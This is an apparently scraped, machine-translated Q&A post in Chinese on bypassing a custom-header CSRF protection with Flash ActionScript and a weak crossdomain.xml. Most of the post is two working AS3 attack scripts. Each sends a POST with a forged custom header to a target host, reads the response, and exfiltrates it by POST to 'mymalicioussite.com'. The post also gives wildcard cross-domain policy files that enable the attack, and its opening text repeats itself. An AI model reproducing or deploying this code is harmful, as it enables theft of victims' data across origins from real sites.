通过弱CrossDomain.xml使用ActionScript绕过CSRF
我有一个目标,它的CrossDomain.xml很弱,但它阻止了查看某个自定义HTTP头的CSRF攻击。我在几个网站上发现了下面的actionscript,除了它没有设置标题外,它工作得非常好 此actionscript向“Target.htm”发送POST请求,我需要它来设置任何自定义头,例如测试头:通过弱CrossDomain.xml使用ActionScript绕过CSRF,actionscript,csrf,actionscript-2,crossdomain.xml,Actionscript,Csrf,Actionscript 2,Crossdomain.xml,我有一个目标,它的CrossDomain.xml很弱,但它阻止了查看某个自定义HTTP头的CSRF攻击。我在几个网站上发现了下面的actionscript,除了它没有设置标题外,它工作得非常好 此actionscript向“Target.htm”发送POST请求,我需要它来设置任何自定义头,例如测试头: package { import flash.display.Sprite; import flash.events.*; import flash.net.URLReq
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
import flash.net.URLVariables;
import flash.net.URLRequestHeader;
public class FlashTest extends Sprite {
public function FlashTest() {
// write as3 code here..
//Target URL
var header:URLRequestHeader = new URLRequestHeader("Test-Header", "Test123");
var readFrom:String = "http://192.168.100.4/Target.htm";
var readRequest:URLRequest = new URLRequest(readFrom);
readRequest.data = "ThisDoesNotMatter"
readRequest.method = URLRequestMethod.POST
readRequest.requestHeaders.push(header);
var getLoader:URLLoader = new URLLoader();
getLoader.addEventListener(Event.COMPLETE, eventHandler);
try
{
getLoader.load(readRequest);
}
catch(error:Error)
{
}
}
private function eventHandler(event:Event):void
{
var sendTO:String = "http://mymalicioussite.com";
var sendRequest:URLRequest = new URLRequest(sendTO);
sendRequest.method = URLRequestMethod.POST;
sendRequest.data = event.target.data;
var sendLoader:URLLoader = new URLLoader();
try
{
sendLoader.load(sendRequest);
}
catch(error:Error)
{
}
}
}
}
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-domain-policy>
当目标同时接受GET、GET和POST请求时,使用GET请求而不是POST的工作代码也可以工作。据我所知,只有POST请求才允许设置自定义头,但带有任何标准HTTP头的GET请求至少目前适用于我。在执行了一些测试后,我能够修改上述脚本以设置任何自定义头(浏览器不允许的Referer和User Agent头除外): 此外,仅当目标和攻击机器应具有以下crossdomain.xml时,此操作才有效:
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-
domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
import flash.net.URLVariables;
import flash.net.URLRequestHeader;
public class FlashTest extends Sprite {
public function FlashTest() {
// write as3 code here..
//Set Header
var headers:Array = [new URLRequestHeader("TestHeader", "Test123")];
//Target URL
var readFrom:String = "http://192.168.253.133/Target.htm";
var readRequest:URLRequest = new URLRequest(readFrom);
readRequest.requestHeaders = headers;
readRequest.data = "ThisDoesNotMatter" //POST data
readRequest.method = URLRequestMethod.POST
//readRequest.requestHeaders.push();
var getLoader:URLLoader = new URLLoader();
getLoader.addEventListener(Event.COMPLETE, eventHandler);
try
{
getLoader.load(readRequest);
}
catch(error:Error)
{
}
}
private function eventHandler(event:Event):void
{
var sendTO:String = "http://mymalicioussite.com";
var sendRequest:URLRequest = new URLRequest(sendTO);
sendRequest.method = URLRequestMethod.POST;
sendRequest.data = event.target.data;
var sendLoader:URLLoader = new URLLoader();
try
{
sendLoader.load(sendRequest);
}
catch(error:Error)
{
}
}
}
}//package